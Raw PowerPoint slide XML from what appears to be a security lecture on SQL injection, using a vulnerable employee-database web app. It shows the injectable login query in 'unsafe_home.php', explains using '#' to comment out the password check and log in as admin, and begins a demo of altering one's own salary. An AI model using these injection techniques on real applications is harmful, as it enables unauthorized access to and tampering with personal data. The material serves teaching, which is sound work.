            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E98E8A3C-E749-294B-949F-32EE33FDBE98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="34688" t="39630" r="42097" b="49999"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6024038" y="3393346"/>
            <a:ext cx="2981868" cy="749275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="719558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a:t>Interact with database </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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2A02A2FA-9F4F-4A68-8FED-5667A395E0E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="21528" t="59848" r="37023" b="21970"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1039735" y="1173844"/>
            <a:ext cx="7947919" cy="2178955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29E7837B-6B64-C648-A91C-87E1173CC0FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754594" y="3578824"/>
            <a:ext cx="7947919" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT Name, Salary, SSN FROM employee WHERE EID=‘eid5000’ AND Password=‘paswd123’; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2534514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995451E-4B1C-994E-A1E1-613EF9AF28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E22569-1DE9-FE4A-B32E-4FEA72E9DA42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In my demo...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3940891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98A2F8-3BA4-9944-88B7-E30B8052AD99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113774" y="411032"/>
            <a:ext cx="6726963" cy="3983446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20875EB2-0BC2-A142-9B2B-EB15FA33A1F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520998" y="4700240"/>
            <a:ext cx="5051503" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Demo is all running in my VM. Do not run it in real world!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F03D55C-D6F8-2B40-93A9-2B4181D2D72B}"/>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078C910E-AC5C-944D-A38D-DEDAEEFF536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33219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04D45-C22E-2C40-AE9B-0BE917AFBE72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643467" y="346252"/>
            <a:ext cx="7645400" cy="3303587"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>credential</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>There are mainly two types of users in this web application:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Administrator is a privilege role and can manage each individual employees’ profile information;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Employee is a normal role and can view or update his/her own profile information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77DB92B7-3F73-5D4A-A1BC-9FEED229CADA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="387295" y="2816048"/>
            <a:ext cx="8543925" cy="1981200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1599144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altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Substitute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>real</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>site</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12BCEB99-4DE3-4144-8363-D448793E4305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>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6003"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2222091" y="796850"/>
            <a:ext cx="5353050" cy="3598862"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400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2F5A62-0136-2B47-AC97-51F2AA14B873}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1663173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09925-2234-184D-9C5F-2256F48E987B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unsafe_home.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02671967-0F56-E141-A16D-5CE854883E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9F2815-E2BB-BD4D-93A6-AB320CD2CC0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="3419"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="231030" y="3212071"/>
            <a:ext cx="8831425" cy="1198901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29E343EA-6C18-814D-B147-AD5329F23323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="308105" y="1823012"/>
            <a:ext cx="8677275" cy="1247775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4104914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39205C-8281-8F47-A5D9-5F8926D4C790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo #1 ”login” as admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>﻿      $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> = "SELECT id, name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>eid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>, salary, birth, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>phoneNumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>, address, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>email,nickname,Password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>      FROM credential</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>      WHERE name= '$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>input_uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>' and Password='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>hashed_pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>’”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>      WHERE name = ‘admin’;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8C6E43"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>this is what we want!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>      WHERE name= ‘                             ' and Password='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>hashed_pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>’”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D60BE3CD-12B0-7849-B4D2-5015CF4B9405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163574" y="4041767"/>
            <a:ext cx="6844284" cy="530915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Text from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> character to the end of line is treated as a comment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5B2D98C-768D-2244-8702-CD8B812F9836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3141311" y="3590277"/>
            <a:ext cx="1679045" cy="451490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389247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41CE-0441-4441-BFC3-C5F0B1438A40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo #2 Update my salary </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3377D13-663F-7344-93B9-20D3266B8B66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749300" y="1080029"/>
            <a:ext cx="4725811" cy="3303587"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>After login, user can change his/her profile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Salary cannot be changed. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>When employees update their information through the Edit Profile page, the following SQL UPDATE query will be executed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
